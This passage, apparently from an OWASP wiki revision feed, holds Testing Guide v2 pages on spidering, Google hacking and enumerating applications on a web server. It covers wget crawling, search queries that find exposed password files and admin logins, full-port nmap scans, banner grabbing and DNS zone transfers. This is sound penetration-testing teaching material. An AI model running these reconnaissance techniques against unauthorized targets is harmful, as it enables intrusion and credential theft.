http://&amp;lt;host&amp;gt;/&amp;lt;dir&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Directory Listing Denied&lt;br /&gt;
This Virtual Directory does not allow contents to be listed.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Forbidden&lt;br /&gt;
You don't have permission to access /&amp;lt;dir&amp;gt; on this server.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* [1] [[http://www.ietf.org/rfc/rfc2616.txt?number=2616 RFC2616]] Hypertext Transfer Protocol -- HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&amp;diff=14831</id>
		<title>Testing: Spidering and googling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&amp;diff=14831"/>
				<updated>2007-01-02T21:05:28Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
This paragraph describes how to retrieve information about the application to test using spidering and googling techniques.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Web spiders are the most powerful and useful tools developed for both good and bad intentions on the Internet. A spider serves one major function, Data Mining. The way a typical spider (like Google) works is by crawling a website one page at a time, gathering and storing the relevant information such as email address, meta-tags, hidden form data, URL information, links, etc. The spider then crawls all the links in that page, collecting relevant information in each following page, and so on. Before you know it, the spider has crawled thousands of links and pages gathering bits of information and storing into a database. This web of paths is where the term 'spider' is derived from. &lt;br /&gt;
&lt;br /&gt;
The Google search engine found at http://www.google.com offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed &amp;quot;Google Hacking.&amp;quot;&lt;br /&gt;
In 1992, there were about 15,000 websites; by 2006 the number had exceeded 100 million. What if a simple query to a search engine like Google, such as &amp;quot;Hackable Websites w/ Credit Card Information&amp;quot;, produced a list of websites that contained the credit card data of thousands of customers per company?&lt;br /&gt;
If an attacker was aware of a web application that utilized a clear-text password file in a directory and wanted to gather these targets, he could search on &amp;quot;intitle:&amp;quot;Index of&amp;quot; .mysql_history&amp;quot;, and for any of the 100 million websites the engine would provide a list of database usernames and passwords. Or perhaps the attacker has a new method to attack a Lotus Notes web server and simply wants to see how many targets are on the Internet; he could search for &amp;quot;inurl:domcfg.nsf&amp;quot;. Apply the same logic to a worm looking for its next victim.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
===Spidering===&lt;br /&gt;
&lt;br /&gt;
'''Description and goal'''&lt;br /&gt;
&lt;br /&gt;
Our goal is to create a map of the application with all the points of access (gates) to the application.&lt;br /&gt;
This will be useful for the second active phase of pen testing.&lt;br /&gt;
You can use a tool such as wget (powerful and very easy to use) to retrieve all the information published by the application.&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
The -s option is used to collect the HTTP headers returned by the web server. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wget -s &amp;lt;target&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Tue, 12 Dec 2006 20:46:39 GMT&lt;br /&gt;
Server: Apache/1.3.37 (Unix) mod_jk/1.2.8 mod_deflate/1.0.21 PHP/5.1.6 mod_auth_&lt;br /&gt;
passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.26&lt;br /&gt;
34a mod_ssl/2.8.28 OpenSSL/0.9.7a&lt;br /&gt;
X-Powered-By: PHP/5.1.6&lt;br /&gt;
Set-Cookie: PHPSESSID=b7f5c903f8fdc254ccda8dc33651061f; expires=Friday, 05-Jan-0&lt;br /&gt;
7 00:19:59 GMT; path=/&lt;br /&gt;
Expires: Sun, 19 Nov 1978 05:00:00 GMT&lt;br /&gt;
Last-Modified: Tue, 12 Dec 2006 20:46:39 GMT&lt;br /&gt;
Cache-Control: no-store, no-cache, must-revalidate&lt;br /&gt;
Cache-Control: post-check=0, pre-check=0&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=utf-8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
The -r option is used to recursively collect the website's content, and the -D option restricts the requests to the specified domain.  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wget -r -D &amp;lt;domain&amp;gt; &amp;lt;target&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
22:13:55 (15.73 KB/s) - `www.******.org/indice/13' saved [8379]&lt;br /&gt;
&lt;br /&gt;
--22:13:55--  http://www.******.org/*****/********&lt;br /&gt;
           =&amp;gt; `www.******.org/*****/********'&lt;br /&gt;
Connecting to www.******.org[xx.xxx.xxx.xx]:80... connected.&lt;br /&gt;
HTTP request sent, awaiting response... 200 OK&lt;br /&gt;
Length: unspecified [text/html]&lt;br /&gt;
&lt;br /&gt;
    [   &amp;lt;=&amp;gt;                                                                                                                                                                ] 11,308        17.72K/s                     &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Googling===&lt;br /&gt;
&lt;br /&gt;
'''Description and goal'''&lt;br /&gt;
&lt;br /&gt;
The scope of this activity is to find information about a single website published on the Internet, or to find a specific kind of application such as Webmin or VNC.&lt;br /&gt;
There are many tools that carry out these specific queries, such as ''googlegath'', but it is also possible to perform this operation directly using Google's web search.&lt;br /&gt;
This operation doesn't require a high level of technical skill, and is a good way to collect information about a web target.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''' Tips for Advanced Search with Google '''&lt;br /&gt;
&lt;br /&gt;
* Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No spaces follow these signs.&lt;br /&gt;
* To search for a phrase, supply the phrase surrounded by double quotes (&amp;quot; &amp;quot;).&lt;br /&gt;
* A period (.) serves as a single-character wildcard.&lt;br /&gt;
* An asterisk (*) represents any whole word, not the completion of a word as in traditional wildcard usage.&lt;br /&gt;
&lt;br /&gt;
Google advanced operators help refine searches. Advanced operators use the following syntax: operator:search_term. Notice that there is no space between the operator, the colon, and the search term. A list of operators and search terms follows:&lt;br /&gt;
* The ''site'' operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.&lt;br /&gt;
* The ''filetype'' operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.&lt;br /&gt;
* The ''link'' operator instructs Google to search within hyperlinks for a search term.&lt;br /&gt;
* The ''cache'' operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.&lt;br /&gt;
* The ''intitle'' operator instructs Google to search for a term within the title of a document.&lt;br /&gt;
* The ''inurl'' operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.&lt;br /&gt;
&lt;br /&gt;
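Since the operator syntax is purely mechanical (operator, colon, term, no spaces; multi-word phrases in double quotes), queries can be composed programmatically; a minimal Python sketch (the build_query helper is ours, not part of any tool):&lt;br /&gt;

```python
# Build a Google query string from plain terms and advanced operators.
# Operator and term are joined by a colon with no spaces, as Google
# requires; multi-word phrases are wrapped in double quotes.
def build_query(*terms, **operators):
    parts = ['"%s"' % t if " " in t else t for t in terms]
    parts += ["%s:%s" % (op, val) for op, val in operators.items()]
    return " ".join(parts)

print(build_query("index of", site="www.example.com"))
# "index of" site:www.example.com
```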
A set of googling examples (for a complete list see [1]):&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:www.xxxxx.ca AND intitle:&amp;quot;index.of&amp;quot; &amp;quot;backup&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The ''site'' operator restricts the search to a specific domain, while the ''intitle'' operator makes it possible to find the pages that contain &amp;quot;index of backup&amp;quot; in the title shown in the Google output.&amp;lt;br&amp;gt;&lt;br /&gt;
The AND boolean operator is used to combine multiple conditions in the same query.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Index of /backup/&lt;br /&gt;
&lt;br /&gt;
 Name                    Last modified       Size  Description&lt;br /&gt;
&lt;br /&gt;
 Parent Directory        21-Jul-2004 17:48      -  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;Login to Webmin&amp;quot; inurl:10000&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The query produces an output with every Webmin authentication interface collected by Google during the spidering process.&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
site:www.xxxx.org AND filetype:wsdl wsdl&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
The ''filetype'' operator is used to find specific kinds of files on the website.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [1] Johnny Long: &amp;quot;Google Hacking&amp;quot; - http://johnny.ihackstuff.com&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Google – http://www.google.com&amp;lt;br&amp;gt;&lt;br /&gt;
* wget - http://www.gnu.org/software/wget/&lt;br /&gt;
* Foundstone SiteDigger - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/sitedigger.htm&lt;br /&gt;
* NTOInsight - http://www.ntobjectives.com/freeware/index.php&amp;lt;br&amp;gt;&lt;br /&gt;
* Burp Spider - http://portswigger.net/spider/&amp;lt;br&amp;gt;&lt;br /&gt;
* Wikto - http://www.sensepost.com/research/wikto/&amp;lt;BR&amp;gt;&lt;br /&gt;
* Googlegath - http://www.nothink.org/perl/googlegath/&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14830</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14830"/>
				<updated>2007-01-02T20:43:45Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents#Web_Application_Penetration_Testing Up]]&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step for testing for web application vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or exfiltrate data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without direct reference from the main website/application: this is true for internal and/or extranet websites which could be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use a common path for administrative interfaces which can be used to guess or brute force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but, in any case, it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client may not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &lt;br /&gt;
&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. In the following examples, we will examine a few techniques that can be employed to achieve this goal. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&lt;br /&gt;
'''1. Different base URL''' &lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as:&lt;br /&gt;
http://www.example.com/url1 &lt;br /&gt;
http://www.example.com/url2 &lt;br /&gt;
http://www.example.com/url3 &lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised.&lt;br /&gt;
&lt;br /&gt;
'''2. Non-standard ports'''&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&lt;br /&gt;
'''3. Virtual hosts'''&lt;br /&gt;
DNS allows us to associate a single IP address with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not actually necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content by means of so-called virtual hosts. The information specifying which virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
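Because the virtual host is selected solely by the ''Host:'' header, candidate names can be probed by sending otherwise identical requests to the same IP while varying that header. A minimal sketch of the raw requests involved (host names taken from the example above; actually sending them over a socket is left as a comment):&lt;br /&gt;

```python
# Build raw HTTP/1.1 requests for the same IP but different virtual
# hosts. The server at the target IP chooses which site to serve based
# solely on the Host: header (RFC 2616).
def vhost_request(hostname, path="/"):
    return ("GET %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Connection: close\r\n\r\n" % (path, hostname))

for name in ("www.example.com", "helpdesk.example.com", "webmail.example.com"):
    req = vhost_request(name)
    # Each request would go to the same address, e.g.:
    #   import socket
    #   socket.create_connection(("192.168.1.100", 80)).sendall(req.encode())
    print(req.splitlines()[1])   # the Host: line that varies per probe
```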
&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
There is no way to absolutely ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, we may employ a few criteria that will aid in the search.&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect.&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could do a bit of googling using the ''site'' operator and examining the result of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a webmail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
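Such a dictionary-style probe can be sketched as follows (the wordlist is illustrative only; a real test would use a much larger list and actually send an HTTP request for each candidate, as indicated in the comment):&lt;br /&gt;

```python
# Generate candidate URLs for unadvertised applications from a small,
# illustrative wordlist; a real probe would request each one and note
# which return something other than 404.
COMMON_PATHS = ["webmail", "admin", "manager/html", "phpmyadmin", "backup"]

def candidate_urls(base, paths=COMMON_PATHS):
    return ["%s/%s" % (base.rstrip("/"), p) for p in paths]

urls = candidate_urls("https://www.example.com")
print(urls[0])   # https://www.example.com/webmail
# The probing step would be, e.g.:
#   import urllib.request
#   for u in urls:
#       try:
#           urllib.request.urlopen(u)   # no exception -> worth a look
#       except Exception:
#           pass
```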
&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or for indications of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is in fact an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – beyond what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&lt;br /&gt;
''DNS zone transfers''&lt;br /&gt;
This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try.&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least one symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served by that name server as well). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for the domain ''example.com''.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
A zone transfer may now be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNS inverse queries''&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issuing a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
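For reference, a PTR query simply looks up the reversed-octet name under the in-addr.arpa pseudo-domain; the sketch below shows how that name is formed (the actual lookup, left as a comment, would use the standard socket.gethostbyaddr call and requires network access plus an existing PTR record):&lt;br /&gt;

```python
# A PTR query reverses the IPv4 octets and appends .in-addr.arpa:
# 192.168.1.100 -> 100.1.168.192.in-addr.arpa
def ptr_name(ip):
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"

print(ptr_name("192.168.1.100"))   # 100.1.168.192.in-addr.arpa

# The actual inverse lookup would be:
#   import socket
#   hostname, aliases, addrs = socket.gethostbyaddr("192.168.1.100")
```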
&lt;br /&gt;
''Web-based DNS searches''&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow you to perform name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained are pertinent to the target you are examining.&lt;br /&gt;
&lt;br /&gt;
''Reverse-IP services''&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &lt;br /&gt;
(requires free membership) &lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/  &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &lt;br /&gt;
(multiple services available) &lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &lt;br /&gt;
(some services are still private at the time of writing) &lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &lt;br /&gt;
(reverse ip/domain lookup) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse-IP services for 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address were revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Googling''&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to possibly refine and expand your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed under Black Box testing, no matter how much information you start with.&lt;br /&gt;
